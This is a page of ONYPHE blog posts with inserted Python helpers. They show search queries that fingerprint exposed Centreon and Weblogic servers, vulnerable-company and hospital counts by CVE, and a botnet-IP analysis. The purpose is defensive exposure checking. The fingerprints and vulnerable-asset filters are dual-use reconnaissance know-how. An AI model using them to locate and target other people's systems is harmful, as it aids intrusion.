Identifying your Internet exposed Centreon monitoring software

As cybercriminals are exploiting weaknesses in Centreon monitoring software and our customers may be at risk, here are some details on how to detect Internet exposure of this software using our data. Let's dive into the different options for doing so.

Identifying Centreon patterns using the data field

The data field is a full-text search field: you can search for words or phrases within the raw responses collected by our application probes. This field is available in most of our categories of information (see standard information categories and Entreprise information categories). For this post, we focus on the datascan category.

Centreon exposes several patterns we can use to identify it accurately. We will start with two of them:

category:datascan data:"<img src=\"img/centreon.png\" alt=\"Centreon Logo\" title=\"Centreon Logo\" />"
category:datascan data:"<a href=\"mailto:contact@centreon.com\">Centreon</a>"

If you use the first query on our beta Web site, you will get the following result:

With the first pattern, we identify 570 exposed devices. Using the second pattern, we identify 400 devices.

Another way: using the app.http.title field

The app.http.title field is also a full-text search field, but we can use it to match a complete phrase if we want to. It holds the content of the HTML title tag:

category:datascan app.http.title:"Centreon - IT & Network Monitoring"

This time, we identify 601 devices. But from analyzing our data, we know the "Centreon" string may differ because the title can be customized. So let's rewrite our search with fewer words:

category:datascan app.http.title:"IT & Network Monitoring"

612 devices are now found.

Using an OR query to combine them all

Now, it would be great to combine these with an OR query. This is, in fact, a new feature of our query language, currently in beta and only available on https://beta.onyphe.io. It is part of the advanced query language functions available to "Lion View" and "Eagle View (unlimited)" subscriptions. An OR query is built by prefixing each wanted field with a question mark (the ? character).

The new language searches the datascan category by default, so you can skip the category:datascan part:

?app.http.title:"Centreon - IT & Network Monitoring" ?data:"<a href=\"mailto:contact@centreon.com\">Centreon</a>" ?data:"<img src=\"img/centreon.png\" alt=\"Centreon Logo\" title=\"Centreon Logo\" />"

Which gives us 623 results.


But there are more ways of finding them

Maybe these patterns are not enough, for instance because they were not present in the response at the time of scanning. So we can search against two more fields: url and host.

A standard way of exposing software on a Web site is to give it a base URL containing the name of the software. By using a wildcard query against the url field, you can find potentially more exposed devices:

-wildcard:url,*centreon*

More than 1,400 devices are exposed.

When we perform DNS resolutions (forward and reverse), we split the results into several other fields to make them easy to search. These fields are not subject to full-text search: we can only use them in wildcard queries or exact-match queries.

When we take a fully-qualified domain name (FQDN), we split it into the following new fields:

  • host: the hostname part
  • domain: the domain name
  • subdomains: one or more subdomains
  • tld: the top-level domain

Another standard practice is to name a computer after its usage. For Centreon software, we can find exposed devices with a host:centreon filter, which yields 2,276 devices.

Of course, you can combine all these filters, adding the -orwildcard function to also match optionally against URLs:

?host:centreon -orwildcard:url,*centreon* ?app.http.title:"IT & Network Monitoring" ?data:"<a href=\"mailto:contact@centreon.com\">Centreon</a>" ?data:"<img src=\"img/centreon.png\" alt=\"Centreon Logo\" title=\"Centreon Logo\" />"

We have a grand final result of 3,653 exposed devices.
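The same three fingerprints can be applied locally to a raw HTTP response, which is what the data: and app.http.title: filters do server-side, and turned back into the OR query above. The following is an added example, not ONYPHE's code: only the query syntax and the rule that a double quote inside a quoted value is backslash-escaped come from this post; the two sample responses are constructed for the demo.

```python
"""Added example (not ONYPHE's code): apply the post's three Centreon
fingerprints to a raw HTTP response the way the data: and app.http.title:
filters do, and build the matching OQL OR query.  The sample responses
below are constructed for this demo."""
import re

# (OQL field, literal) pairs exactly as the post searches them.
CENTREON_FINGERPRINTS = [
    ("app.http.title", "IT & Network Monitoring"),
    ("data", '<a href="mailto:contact@centreon.com">Centreon</a>'),
    ("data", '<img src="img/centreon.png" alt="Centreon Logo" title="Centreon Logo" />'),
]

_TITLE_RE = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def http_title(response: str) -> str:
    """Text of the <title> tag of a raw HTTP response, or '' if absent."""
    m = _TITLE_RE.search(response)
    return m.group(1).strip() if m else ""


def centreon_matches(response: str) -> list:
    """Return the fingerprints present in a raw HTTP response (headers + body).

    'data' literals are plain substring matches over the whole response,
    mirroring the full-text search on the data field; the 'app.http.title'
    literal is matched against the <title> text only, so a customised prefix
    such as 'ACME - ' does not break detection."""
    title = http_title(response)
    found = []
    for field, literal in CENTREON_FINGERPRINTS:
        haystack = title if field == "app.http.title" else response
        if literal in haystack:
            found.append((field, literal))
    return found


def oql_quote(value: str) -> str:
    """Wrap a value in double quotes, backslash-escaping embedded double quotes."""
    return '"' + value.replace('"', '\\"') + '"'


def oql_or_query(fingerprints=CENTREON_FINGERPRINTS, host=None, url_glob=None) -> str:
    """Build the beta-language OR query from the post.

    Each ?field:"value" term is OR-ed with the others; -orwildcard:url,<glob>
    adds an optional wildcard match on the url field.  The category defaults
    to datascan, so it is omitted."""
    terms = []
    if host:
        terms.append(f"?host:{host}")
    if url_glob:
        terms.append(f"-orwildcard:url,{url_glob}")
    terms.extend(f"?{field}:{oql_quote(literal)}" for field, literal in fingerprints)
    return " ".join(terms)


# Constructed responses: a customised Centreon login page and an unrelated one.
SAMPLE_CENTREON = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<html><head><title>ACME - IT & Network Monitoring</title></head><body>"
    '<img src="img/centreon.png" alt="Centreon Logo" title="Centreon Logo" />'
    '<a href="mailto:contact@centreon.com">Centreon</a></body></html>'
)
SAMPLE_OTHER = "HTTP/1.1 200 OK\r\n\r\n<html><head><title>Nagios Core</title></head></html>"

if __name__ == "__main__":
    for fp in centreon_matches(SAMPLE_CENTREON):
        print("matched", fp)
    print(oql_or_query(host="centreon", url_glob="*centreon*"))
```

Run against a saved response (curl -si https://your-host/centreon/ > page.txt) to check your own hosts before querying ONYPHE; the printed query is byte-for-byte the combined query shown above.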

Identification of assets made even easier

Of course, now that these data patterns have been identified, we have added them to our identification patterns to make searching easier next time. That is, we have added the Centreon product to the assets we identify using other specific fields: device.class and app.http.component.product.

We believe asset categorization is a must-have for any Internet-exposed device scanner, and we use the device.class field for that purpose. Knowing you have "VPN Server" or "Monitoring" device classes exposed is something you should really pay attention to.

device.class:Monitoring app.http.component.product:Centreon

Conclusion

As we have seen, we have accurate data and many specific fields to make it easy for you to find your Internet-exposed devices. We hope you won't be the next to fall because of an unpatched system. Subscribe to one of our offers and quickly dive into your exposed devices.

1,100 Oracle Weblogic servers vulnerable to CVE-2020-14882 can be easily compromised

Back in August 2020, we warned that many global500 or fortune500 companies could be easily compromised through exploitation of known, trivial vulnerabilities.

Now, we have added a new check to our vulnscan category of information for an unauthenticated remote code execution vulnerability on Oracle Weblogic servers, CVE-2020-14882. Here are our test results.

1. Searching for potentially vulnerable systems

The first thing to do before checking for vulnerable systems is to find potentially vulnerable ones. Fortunately, there is a specific filter to query ONYPHE for this list:

category:datascan app.http.component.product:"Weblogic server" app.http.component.productvendor:"Oracle"

We found more than 14,000 exposed devices. But being exposed does not mean being exploitable. As we have developed our own non-intrusive check, we are able to verify in an innocuous way whether they are vulnerable or not. Our checker only fetches the Operating System and its version, so we also get details about which kinds of systems host Weblogic servers.

As we don't want to help cybercriminals, and as there are already enough proof-of-concept codes available out there, we are not going to release our checker.

2. Count of vulnerable systems

By using a simple filter on our vulnscan category of information, we can know how many unique IP addresses are vulnerable, how many unique domains, and the count of unique fortune500/global500 companies. The filter is simply cve:CVE-2020-14882:

category:vulnscan cve:CVE-2020-14882

Beware: the 2,000 displayed is a misleading number, as it counts results, not unique IP addresses (the same IP can appear in several results). Here are some screenshots from our back-end giving the correct numbers:

3. Operating System used to host Oracle Weblogic servers

As we fetch Operating System (OS) and version information and store it in a specific field, we can compute statistics on these values:

top used operating systems

Linux is the most used OS with 76.2%, followed by Windows Server 2012 R2 with 11.1% and Windows Server 2016 with 8.4%. Interestingly, we also find SunOS and AIX, even though they are not widely used at all.
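The "2,000 is misleading" caveat above, and the "about 2 domains per company" rule of thumb used in the next post, both come down to deduplicating an export before counting. The following is an added example, not ONYPHE's code: it computes unique IPs, unique domains, big-company domains and the OS split from a vulnscan export (one JSON document per line). The ip, domain, cve and tag field names appear elsewhere on this page; "os" as the name of the OS field is an assumption, and the four records are constructed.

```python
"""Added example (not ONYPHE's code): compute the figures the post reports
from a vulnscan export (one JSON document per line) instead of trusting the
raw result count.  'os' as the OS field name is an assumption; the four
records below are constructed."""
import json
import math
from collections import Counter

BIG_COMPANY_TAGS = {"fortune500", "global500"}

# Constructed export: the same IP seen twice, three IPs in total.
SAMPLE_EXPORT = "\n".join(json.dumps(d) for d in [
    {"@category": "vulnscan", "cve": "CVE-2020-14882", "ip": "203.0.113.10",
     "domain": "example.com", "hostname": "wls1.example.com", "os": "Linux", "tag": ["fortune500"]},
    {"@category": "vulnscan", "cve": "CVE-2020-14882", "ip": "203.0.113.10",
     "domain": "example.com", "hostname": "wls2.example.com", "os": "Linux", "tag": ["fortune500"]},
    {"@category": "vulnscan", "cve": "CVE-2020-14882", "ip": "203.0.113.11",
     "domain": "example.org", "os": "Windows Server 2012 R2"},
    {"@category": "vulnscan", "cve": "CVE-2020-14882", "ip": "198.51.100.5",
     "domain": "example.net", "os": "Linux", "tag": "global500"},
])


def _tags(record: dict) -> set:
    """tag may be absent, a string or a list; normalise to a set."""
    tags = record.get("tag", [])
    return {tags} if isinstance(tags, str) else set(tags)


def summarize(export_text: str, cve: str) -> dict:
    """Unique IPs, unique domains, big-company domains and OS share for one CVE."""
    records = [json.loads(line) for line in export_text.splitlines() if line.strip()]
    hits = [r for r in records if r.get("cve") == cve]
    ips = {r["ip"] for r in hits}
    domains = {r["domain"] for r in hits if r.get("domain")}
    big_domains = {r["domain"] for r in hits
                   if r.get("domain") and _tags(r) & BIG_COMPANY_TAGS}
    # OS share is computed per unique IP, not per result line.
    os_by_ip = {r["ip"]: r.get("os", "unknown") for r in hits}
    total = len(os_by_ip) or 1
    os_share = {name: round(100.0 * n / total, 1)
                for name, n in Counter(os_by_ip.values()).most_common()}
    return {
        "results": len(hits),
        "unique_ips": len(ips),
        "unique_domains": len(domains),
        "big_company_domains": len(big_domains),
        # Rule of thumb from the next post: about 2 domains per company.
        "estimated_big_companies": math.ceil(len(big_domains) / 2),
        "os_share": os_share,
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_EXPORT, "CVE-2020-14882"), indent=2))
```

Feed it the output of the Export API (onyphe -export 'category:vulnscan cve:CVE-2020-14882') instead of SAMPLE_EXPORT to reproduce the unique-IP and unique-domain figures rather than the raw result count.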

4. Conclusion

More than 1,100 unique IP addresses are impacted, accounting for 231 unique domains and at least 5 unique big companies.

This check will be executed every week from now on, so we will have updated information available for our Eagle View customers.

Patches are available, so apply them as quickly as possible, as this vulnerability may end up in the next NSA TOP25 list of the vulnerabilities most exploited by cybercriminals.

Many global500 and fortune500 companies still vulnerable to known critical vulnerabilities

For a few months now, cyber criminals have been targeting vulnerabilities in VPN appliances from major brands to compromise companies and deploy ransomware.

As we explained in a previous blog post, we check those vulnerabilities at Internet scale to help our customers find and fix their assets before the bad guys exploit them, which can eventually cost millions to recover from.

In this blog post, we introduce our new tagging capability, which allows us to find all vulnerable global500 and fortune500 companies with a single API query.

1. Vulnerabilities we are able to detect

Today, we check 7 critical vulnerabilities. They are exploitable remotely over the network, with no user interaction and no authentication required. They lead to remote code execution or to the theft of credentials on affected targets, and that is why cyber crooks love them.

Here is the list of CVE we are checking for:

Proportion of impacted devices by CVE

2. Introducing the fortune500 and global500 tags

Since August 22nd, we have added lookup capabilities to our scanning engine. We have built a comprehensive inventory of fortune500 and global500 companies. Each time we receive an application response with a domain name set (for example adobe.com), we add tags when a match is found.

Searching using tag:global500 filter within category:vulnscan
Tag cloud for vulnerable companies

As you can see from the tag cloud, the most prevalent vulnerability found in big companies is the one impacting Cisco ASA (CVE-2020-3452). But what worries us is that some companies still have critical vulnerabilities on their Citrix Gateway, Fortinet FortiGate, SAP NetWeaver Application Server or PulseSecure Pulse Connect Secure devices.

Also, you may note that no company is impacted by the #ghostcat or F5 Networks BIG-IP vulnerabilities.

3. How many of these companies are impacted?

Counting how many of them are vulnerable is not a single, direct query. We can count either the number of unique IP addresses or the number of unique domains. However, a company can have multiple domains; according to our datasets, a reasonable estimate is around 2 domains per company.

Furthermore, a company can use multiple device brands and may thus be counted several times when you add up the figures below. So, for each vulnerability, simply divide the figure below by 2 to get an estimate of how many fortune500 and global500 companies are impacted.

3.1. Cisco ASA devices

Around 180 companies impacted

3.2. SAP Netweaver Application Server

Around 30 companies impacted

3.3. Citrix Gateway

Around 8 companies impacted

3.4. PulseSecure Pulse Connect Secure

Around 3 companies impacted

3.5. Fortinet FortiGate

Only 1 company impacted

As our data shows, around 200 of the biggest companies are still impacted by critical known vulnerabilities for which patches are available. Once duplicates between fortune500 and global500 are removed, there are 881 companies in total.

In the end, more than 20% of big companies have known critical vulnerabilities, that is more than 1 company out of 5.

4. How to verify you are not impacted

Customers with an "Eagle View" subscription can check by themselves. It is the only subscription level that allows querying the vulnscan category of information; other Entreprise-level subscriptions do not give access to such data.

To prevent our online payment service from being abused by malicious actors to fetch this sensitive information, we only sell Eagle Views after proper human interaction and validation that a legitimate company lies behind the subscription request.

Checking that you are not vulnerable is as easy as running an API query against the current week when executed on a Thursday (scans are launched every Wednesday), or against the previous week when executed on a Monday. An empty result set means nothing vulnerable was found for your domain:

category:vulnscan -exists:cve domain:onyphe.io -weekago:0

Of course, you can also use the Alert API or script your queries using the Search API.
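Scripting that weekly check means picking the right -weekago value for the day the script runs and paging through the Search API. The following is an added example, not ONYPHE's code. Assumptions: scans land on Wednesday as stated above, so the current week is queried from Thursday on and the previous week before that; the Authorization header and the /api/v2/search/<OQL> endpoint are taken from elsewhere on this page, while the page query parameter and the max_page response field are assumed.

```python
"""Added example (not ONYPHE's code): run the post's weekly "am I impacted?"
query through the Search API.  The 'page' parameter and the 'max_page'
response field are assumptions; the endpoint and header come from this page."""
import datetime as dt
import json
import urllib.parse
import urllib.request

SEARCH_API = "https://www.onyphe.io/api/v2/search/"


def weekago_for(day: dt.date) -> int:
    """0 once this week's Wednesday scan is in (Thursday..Sunday), else 1."""
    return 0 if day.weekday() >= 3 else 1


def impacted_query(domain: str, day: dt.date) -> str:
    """vulnscan records carrying a cve field for the domain, in the right week;
    an empty result set means nothing vulnerable was found."""
    return f"category:vulnscan -exists:cve domain:{domain} -weekago:{weekago_for(day)}"


def search_url(oql: str, page: int = 1) -> str:
    """OQL goes URL-encoded in the path, as in the newsletter's example."""
    return SEARCH_API + urllib.parse.quote(oql, safe="") + f"?page={page}"


def fetch_all(oql: str, api_key: str):
    """Yield every result across pages (network access and an Eagle View key required)."""
    page = 1
    while True:
        req = urllib.request.Request(search_url(oql, page),
                                     headers={"Authorization": f"apikey {api_key}"})
        with urllib.request.urlopen(req) as resp:
            body = json.load(resp)
        yield from body.get("results", [])
        if page >= int(body.get("max_page", 1)):   # assumed field name
            return
        page += 1


if __name__ == "__main__":
    import os
    oql = impacted_query("onyphe.io", dt.date.today())
    print("query:", oql)
    key = os.environ.get("ONYPHE_API_KEY")
    if key:
        hits = {(r.get("cve"), r.get("ip")) for r in fetch_all(oql, key)}
        print(sorted(hits) or "no vulnerable asset found this week")
```

Scheduling it on Thursday and Monday, as the post suggests, gives one run on fresh data and one safety run on the previous scan; any non-empty output is a (cve, ip) pair to patch.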

Conclusion

These vulnerabilities are massively exploited on the Internet. You don't want to be the next big company falling because of an unpatched VPN endpoint, losing millions, and losing your CEO job too. Contact us at sales[at]onyphe dot io for a demo.

Coronavirus pandemic – hospitals are targets for cyber criminals

Source: https://www.youtube.com/watch?v=8GsLEmZTgFo 

At ONYPHE, we are very concerned about cyber-criminals taking advantage of the current worldwide coronavirus crisis. At our scale, we want to give a hand to hospitals by giving them free information about vulnerabilities we have discovered on their Internet borders. We are willing to share this data with hospitals or any state agency that could relay the information to them. In fact, we have already provided some data to a few of them, but it is far from enough given our results.

We already know many hospitals were compromised, before the crisis or even now. Specific critical vulnerabilities were exploited and ransomware was deployed to extort those hospitals. We are checking those vulnerabilities too. Hospitals are already under pressure because they are (or will be) overwhelmed by sick people who need medication and care; they don't need a cyber-security crisis on top.

This blog post describes what we check, how we check, and which kind of information we currently have. We also describe what we need to cooperate with hospitals and state agencies. But make no mistake, cyber-criminals probably already have the same information at their disposal, so we must take quick action.

Critical vulnerabilities we are currently checking

This week, we worked on writing check code to detect, in a non-intrusive manner, critical vulnerabilities we know are exploited against hospitals worldwide. Those vulnerabilities are exploited to deploy ransomware. They may have names (or not), but in all cases they are intrusive and you must fix them as soon as possible. Here is our current list:

  • CVE-2020-1938 (#ghostcat, Apache Tomcat AJP connector)
  • CVE-2018-13379 (Fortinet FortiGate SSL VPN)
  • CVE-2019-19781 (#Shitrix, Citrix Gateway)
  • CVE-2019-11510 (PulseSecure Pulse Connect Secure)

We currently have 74,166 unique IP addresses vulnerable to one of these 4 critical vulnerabilities. Fortunately, they are not all hospitals.

Around 63% are about CVE-2020-1938, 20% about CVE-2018-13379, 14% about CVE-2019-19781 and finally 3% for CVE-2019-11510.

How do we check these vulnerabilities?

Exploit code is available for all these critical vulnerabilities. We developed our own checking methodology based on that information: we verify the presence (or absence) of each vulnerability by requesting an innocuous URL and checking the response. We do not rely solely on versions obtained by banner grabbing for these specific vulnerabilities.

What do we need from hospitals or state agencies?

If you are a hospital, or a state agency looking for vulnerable hospitals in your country, we are willing to give you free information on impacted devices. What we need from you is the list of domain names or host names of your country's hospitals. With this list, we can correlate with our vulnscan data to extract the needed information.

For instance, we did this for hospitals in some countries: we were provided a CSV file with a list of domain names. We won't communicate any results or numbers because we don't want to help cyber-criminals, and we communicated our results to some state agencies and hospitals whose names we won't disclose either. We hate saying this, but trust us, we have to take action.

How do we correlate data?

We feed our tool with a CSV file as input. Each line is the domain name or host name of a hospital. For instance:

cat hospital-domains.csv
domain
hospital1.com
hospital2.com

Then we simply launch our tool (publicly available, but an Eagle View subscription is required for querying) as follows to get full JSON information as output (example JSON output can be found in this blog post):

onyphe -export 'category:vulnscan -exists:cve -weekago:0 | whitelist hospital-domains.csv'

This query scrolls through every record we have in the vulnscan category with an existing CVE field for the current week. Each week, we scan for the described vulnerabilities on a list of potentially vulnerable devices that we build by continuously scouting the Internet and applying pattern matching to identify devices and known brands.

For instance, we are able to list all Fortinet FortiGate products connected on the Internet by entering the following query:

category:datascan device.productvendor:Fortinet device.product:FortiGate

Note: this request requires an Entreprise subscription.

During the execution of this scrolled query, we apply the whitelisting by taking values from the CSV file and comparing them against each result found. For each line in the CSV, the tool checks whether the vulnerable entry has a field named "domain" with a corresponding value in the file.
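The same whitelist step can be reproduced offline on an export file. The following is an added example, not ONYPHE's tool: it reads the CSV of hospital domains or host names, keeps only the vulnscan records whose domain, hostname or reverse name is in that list, and groups the surviving IPs by CVE. It goes slightly beyond the description above by also matching on hostname and reverse, so that a CSV line such as vpn.hospital2.com works; the CSV and the three records are constructed.

```python
"""Added example (not ONYPHE's code): whitelist a vulnscan export against a
CSV of hospital domains or host names and group the vulnerable IPs by CVE.
The CSV and the three records below are constructed."""
import csv
import io
import json

# Constructed input files.
SAMPLE_CSV = "domain\nhospital1.com\nvpn.hospital2.com\n"
SAMPLE_EXPORT = "\n".join(json.dumps(d) for d in [
    {"@category": "vulnscan", "cve": "CVE-2019-19781", "ip": "203.0.113.20",
     "domain": "hospital1.com", "hostname": "gw.hospital1.com"},
    {"@category": "vulnscan", "cve": "CVE-2018-13379", "ip": "203.0.113.21",
     "domain": "hospital2.com", "hostname": "vpn.hospital2.com"},
    {"@category": "vulnscan", "cve": "CVE-2020-1938", "ip": "203.0.113.22",
     "domain": "university.edu", "hostname": "ajp.university.edu"},
])


def load_whitelist(csv_text: str) -> set:
    """Values of the 'domain' column, lower-cased, one per line."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {row["domain"].strip().lower()
            for row in reader if (row.get("domain") or "").strip()}


def _names(record: dict) -> set:
    """Every name a record can be matched on; fields may be strings or lists."""
    names = set()
    for field in ("domain", "hostname", "reverse"):
        value = record.get(field)
        if isinstance(value, list):
            names.update(value)
        elif value:
            names.add(value)
    return {n.lower() for n in names}


def whitelist(export_text: str, allowed: set):
    """Yield records whose domain, hostname or reverse name is whitelisted."""
    for line in export_text.splitlines():
        if line.strip():
            record = json.loads(line)
            if _names(record) & allowed:
                yield record


def impacted_by_cve(export_text: str, allowed: set) -> dict:
    """CVE -> sorted list of whitelisted vulnerable IPs, deduplicated."""
    out = {}
    for r in whitelist(export_text, allowed):
        out.setdefault(r["cve"], set()).add(r["ip"])
    return {cve: sorted(ips) for cve, ips in out.items()}


if __name__ == "__main__":
    allowed = load_whitelist(SAMPLE_CSV)
    print(json.dumps(impacted_by_cve(SAMPLE_EXPORT, allowed), indent=2))
```

With a real export, replace SAMPLE_EXPORT by the file written by onyphe -export and SAMPLE_CSV by the hospital list; the per-CVE IP lists are what to hand to the hospital or agency.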

Conclusion

We are willing to help. We monitor the Internet to discover vulnerabilities and weaknesses so our customers can act before cyber-criminals exploit them.

We want to share this information freely with hospitals and state agencies worldwide. You may contact us by email at contact at onyphe dot com so we can help you.

Analyzing Mirai-FBot infected devices found by MalwareMustDie

Following a blog post from MalwareMustDie (MMD) and some tweets about an increase in Mirai-FBot detections, we decided to demonstrate the power of our new Bulk Summary API using data published on pastebin.

UPDATE-20200305: a new list of infected devices has been put online by MMD, so we have updated the JSON file: Bulk queries against 1,429 unique IP addresses now return around 17,000 entries from our data.

Get IP list of infected hosts from MMD’s pastebin

By using standard command line tools, we can fetch the list of IPs made freely available by MMD on their pastebin:

curl -XGET 'https://pastebin.com/raw/8n9G964c' |grep -v "Infected IP of the New FBot" | dos2unix > /tmp/fbot.txt

# How many results do we have?
wc -l /tmp/fbot.txt
582

Execute Bulk Summary API request for each IP address

Now that we have a list in the correct format (one IP address per line), we can use the Bulk Summary API to fetch the last 10 entries we have in each category of information for every IP address in this list.

The goal will be to load that data into a local Elasticsearch database and perform some analytics to learn which kind of device is actually compromised.

curl -XPOST -H 'Authorization: apikey YOUR_API_KEY' -H 'Content-Type: application/json' --data-binary @/tmp/fbot.txt 'https://www.onyphe.io/api/v2/bulk/summary/ip' > /tmp/fbot.json

# How many results do we have?
wc -l /tmp/fbot.json
8227

Loading the data into Elasticsearch

You will have to install Elasticsearch and Kibana. You can follow our training guide on GitHub to install them easily. Or, if you are too lazy to click and follow our guide, here is how to do it:

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.6.0-linux-x86_64.tar.gz
wget https://artifacts.elastic.co/downloads/kibana/kibana-7.6.0-linux-x86_64.tar.gz
wget https://artifacts.elastic.co/downloads/logstash/logstash-7.6.0.tar.gz
tar zxvf elasticsearch-7.6.0-linux-x86_64.tar.gz
# Elasticsearch and Kibana stay in the foreground: start each one in its own terminal
./elasticsearch-7.6.0/bin/elasticsearch
tar zxvf kibana-7.6.0-linux-x86_64.tar.gz
./kibana-7.6.0-linux-x86_64/bin/kibana
tar zxvf logstash-7.6.0.tar.gz

Once they are installed, you can load the JSON data with Logstash. Just create a configuration file named load.conf as follows:

# We use the plain codec then the json filter to avoid the json codec adding
# its own host field, as we are using the host field in ONYPHE data.
input {
  stdin {
    codec => plain { charset => "UTF-8" }
  }
}

filter {
  json {
    source => "message" 
  }
  mutate {
    remove_field => [ "message" ] 
  }
}

output {
  elasticsearch {
    hosts => [ "http://localhost:9200" ]
    index => "fbot"
  }
}

And you can load the data:

cat /tmp/fbot.json | ./logstash-7.6.0/bin/logstash -f load.conf

Preparing Kibana

Before you can play with the data you just loaded, you have to create the Kibana index pattern. First, launch your Web browser and connect to http://localhost:5601/ then follow these steps:

Click on “settings” application at the bottom of left menu (application menu):

Click on “Index Patterns” menu:

Click on “Create index pattern”:

Enter “fbot” as the pattern name and click “Next step”:

Select "@timestamp" as the timestamp field and click on "Create index pattern". You're set.

Ready to analyze

One of the first questions one may ask is: which kind of device is compromised? We have all heard about the Internet of Things (IoT), but is that the case for this botnet?

Let's first search with the device.class filter in the datascan category of information. We will create a Pie Chart visualization of the top device.class values. To make it better for our demonstration, we will set aside the generic classes (like Web Server, Telnet Server and all other kinds of servers).

To do so, create a Pie Chart like this:

Click on “Visualize” application in the application menu:

Then click on “Create new visualization”:

Choose the "fbot" index as the source. Select the last 30 days as the time range, as our Bulk export covers that range (actually, between the 2nd of February and the 2nd of March). And write the following filter:

@category:datascan AND NOT device.class:*Server

Now, we want the top device classes. So click "Add" to create buckets based on the different values of the device.class field:

Choose the "Terms" aggregation and the device.class.keyword field. Also set the size of your top list to 5:

To refine things, also choose to display the "Unique Count" of the ip.keyword field:

Click the "Play" button, and you should get the following Pie Chart:

And the top 5 infected device classes are:

  • Android (~ 53%)
  • TV Box (~ 18%)
  • Camera (~17%)
  • Router (~11%)
  • NAS (~1%)
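The same bucket computation can be done directly on the Bulk Summary output, which is handy when you only want the numbers and not a dashboard. The following is an added example, not ONYPHE's code: it keeps @category:datascan records, drops the generic *Server classes, counts unique IPs per device.class and ranks the top entries, exactly the filter and aggregation configured in Kibana above. The records are constructed; device.class is assumed to be nested as {"device": {"class": ...}} in the JSON, in the same way app.http.title is nested elsewhere on this page.

```python
"""Added example (not ONYPHE's code): the Kibana pie chart computed from a
Bulk Summary export (one JSON document per line) without Elasticsearch.
The records below are constructed; the nesting of device.class is assumed."""
import json
from collections import defaultdict


def _doc(category, ip, klass=None):
    d = {"@category": category, "ip": ip}
    if klass:
        d["device"] = {"class": klass}
    return d


# Constructed export: one IP reported twice, one generic server, one synscan record.
SAMPLE_BULK = "\n".join(json.dumps(d) for d in [
    _doc("datascan", "203.0.113.1", "Android"),
    _doc("datascan", "203.0.113.1", "Android"),    # same IP on another port
    _doc("datascan", "203.0.113.2", "Android"),
    _doc("datascan", "203.0.113.3", "Android"),
    _doc("datascan", "203.0.113.4", "Camera"),
    _doc("datascan", "203.0.113.5", "Router"),
    _doc("datascan", "203.0.113.6", "Web Server"),  # excluded by NOT device.class:*Server
    _doc("synscan", "203.0.113.7", "Android"),      # wrong category
    _doc("datascan", "203.0.113.8"),                # no device.class at all
])


def top_device_classes(export_text: str, size: int = 5) -> list:
    """[(device.class, unique IPs, share %)], the same buckets as the Kibana chart.

    Share is relative to the IPs in the displayed buckets, which is what a
    pie chart limited to 'size' slices shows."""
    ips_by_class = defaultdict(set)
    for line in export_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("@category") != "datascan":
            continue
        klass = rec.get("device", {}).get("class")
        if not klass or klass.endswith("Server"):
            continue
        ips_by_class[klass].add(rec["ip"])
    ranked = sorted(ips_by_class.items(), key=lambda kv: (-len(kv[1]), kv[0]))[:size]
    total = sum(len(ips) for _, ips in ranked) or 1
    return [(klass, len(ips), round(100.0 * len(ips) / total, 1)) for klass, ips in ranked]


if __name__ == "__main__":
    for klass, count, share in top_device_classes(SAMPLE_BULK):
        print(f"{klass:<12} {count:>4} IPs  {share:5.1f}%")
```

Point it at /tmp/fbot.json instead of SAMPLE_BULK to get the Android / TV Box / Camera / Router / NAS split without loading anything into Elasticsearch.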

Conclusion

As you have seen, it is easy to analyze data using Elasticsearch+Kibana and our brand new Bulk Summary API. Of course, we have other APIs, as documented on our Web site.

Another question could be: how were those devices infected? And we are sure you have many other questions. Furthermore, we only analyzed the value of one field within the datascan category of information. What can be found in the other categories?

As we love our community, we decided to release for free the data we spoke about in this blog post. Download it, play with it, and let us know about your findings 🙂

Newsletter 2020#1 – APIv2, new pricing and new Web search features

Dear customers and free users,

It is with great pleasure that we announce the general availability of APIv2, a new pricing and new Web search features allowing better and easier navigation, with just a mouse click to go deeper into the data we collect.

1. APIv2 main changes

We have completely reviewed our APIs. We updated the older APIs to make them easier to understand and added many more, now split into the following categories:

  • Simple API
  • Summary API
  • Alert API
  • Bulk API
  • Export API

Simple and Summary APIs are available starting from Free View. Alert API is available starting from Dragonfly View, and Bulk and Export starting from Entreprise Views.

Be aware that Summary APIs query multiple categories of information. From now on, using these APIs may cost more than 1 credit, as they may return up to 100 results (so they may consume up to 10 credits). Other APIs continue to consume only 1 credit. But wait, we have changed our pricing for the better, as you will see.

For the most complete API (the Search API), just pass a query string using OQL (ONYPHE Query Language) and you simply get your results. The Search API is available starting from Dragonfly View. For instance, to search within the new vulnscan information category (available only starting from Eagle View):

https://www.onyphe.io/api/v2/search/category:vulnscan%20cve:CVE-2019-19871?k=YOUR_API_KEY

This is exactly the same syntax as in the Web search engine, so you can now just copy/paste your Web query into your API query.

The Bulk API allows executing Summary queries on a batch of IPs, domains or hostnames. It returns results in raw JSON format. More on that in a future post.

The Export API allows executing a Search query and returning all results in a streaming manner, in raw JSON format. Again, more on that in a future post.

Documentation on how to use those APIs is not ready yet, but it will come very soon and we will let you know as soon as it is available. In the meantime, APIv1 is still available and will remain so for a few more months. Important dates are given at the end of this newsletter.

2. New categories of information


  • topsite: information about top hostnames and domains, those generating the most traffic on the Internet. Information is taken from the Alexa TOP-1M, Cisco Umbrella and Majestic Million lists. As usual, data is updated once a month.
  • vulnscan: at the beginning of the year, we started scanning for the most critical vulnerabilities on identified assets, thanks to our identification engine. For instance, we are able to list all Citrix Gateways available on the Internet, so we launched vulnerability scans for #Shitrix #CVE-2019-19781. As this data is very sensitive, only customers with an Eagle View subscription can access it. We will add more vulnerability checks in the future.

The topsite category is available to all Entreprise Views and the vulnscan category to Eagle Views.

3. New pricing and rate limiting

But we have more cool news for you, dear customers and users. We have reviewed our pricing and decided to give you 10 times more query credits for every View. Even better for Eagle View subscriptions: there are no more limits, you have unlimited credits. Along with this, we now allow 30 requests per minute instead of 20 previously.

Along with this new pricing, Eagle View subscriptions get access to the new vulnscan category of information, on-demand scans, the Export API and premium support. Still not convinced? Try our service with the Dragonfly View: only 59 Euros one-shot with perpetual validity, and up to 10,000 results per month.

Regarding the calendar, here are important dates:

  • 2020-03-01: deployment of APIv2, new pricing and new Web frontend. APIv2 becomes the default for Web queries;
  • 2020-04-01: APIv2 becomes the default for API queries;
  • 2020-07-01: removal of legacy APIv1 endpoints.

